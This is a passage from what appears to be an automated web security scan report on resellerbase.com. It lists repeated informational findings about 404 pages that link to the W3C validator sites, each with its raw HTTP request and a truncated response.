<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.109. http://www.resellerbase.com/detail/12/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/12/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/12/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.110. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.111. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.112. http://www.resellerbase.com/detail/12/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.113. http://www.resellerbase.com/detail/12/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.114. http://www.resellerbase.com/detail/13/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/13/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/13/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.115. http://www.resellerbase.com/detail/14/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/14/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.116. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.117. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.118. http://www.resellerbase.com/detail/14/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/14/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.119. http://www.resellerbase.com/detail/14/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.120. http://www.resellerbase.com/detail/15/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/15/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/15/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.121. http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/15/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.122. http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/15/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.123. http://www.resellerbase.com/detail/15/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.124. http://www.resellerbase.com/detail/15/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.125. http://www.resellerbase.com/detail/16/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/16/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.126. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

